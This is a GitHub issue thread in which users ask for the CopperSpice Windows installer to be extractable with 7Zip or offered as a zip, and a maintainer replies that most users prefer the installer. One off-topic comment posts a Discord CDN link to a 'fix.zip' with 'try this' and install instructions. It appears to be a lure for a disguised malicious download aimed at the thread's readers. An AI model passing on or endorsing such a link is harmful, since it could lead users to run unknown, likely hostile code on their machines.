### ISSUE TITLE
Please make the installer extractable

### ISSUE THREAD

**Issue by chatchoi** [copperspice/copperspice#312]
7Zip can't extract the Windows installer. It can handle installers of other open source projects just fine. The reason I want to extract because I don't want to install. I don't see the installer does anything special at all. It's just an SFX archive. But if you agree with me, please provide .zip archive instead (or .7z if you want to save bandwidth). I'm a fan of portable software.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by chatchoi** [comment]
Frankly speaking, the CopperSpice installer is terribly slow. The self-extract module is the one to be blamed here. Extracting the headers takes ages. 7Zip can extract the archive much faster. It seems you are using NSIS. But I have no idea why I can't use 7Zip to extract the content. Most NSIS installers play nice with 7Zip.

**Comment by mh466lfa** [comment]
Are you sure that it's NSIS? I don't think it's NSIS. BTW, 7Zip can open it. You have to open the archive as `#` or `#:e`. It's a binary inside a binary and can't be extracted to get the content.

**Comment by bgeller** [comment]
We value everyone's comments.  However, @chatchoi you might want to be a bit more careful when making assumptions about how things are implemented in the CopperSpice project. Neither CPack nor NSIS is being used to create the installer. 

We have noted your personal objection to the Windows installer but more of our users prefer this approach.

Barbara

**Comment by chatchoi** [comment]
> We value everyone's comments. However, @chatchoi you might want to be a bit more careful when making assumptions about how things are implemented in the CopperSpice project. Neither CPack nor NSIS is being used to create the installer.
> 
> We have noted your personal objection to the Windows installer but more of our users prefer this approach.
> 
> Barbara

Yeah. This is my mistake. I don't know that you yourself don't use the preferred method to package CopperSpice applications as shown in all CMake build scripts in your organization (and your documentation, too).
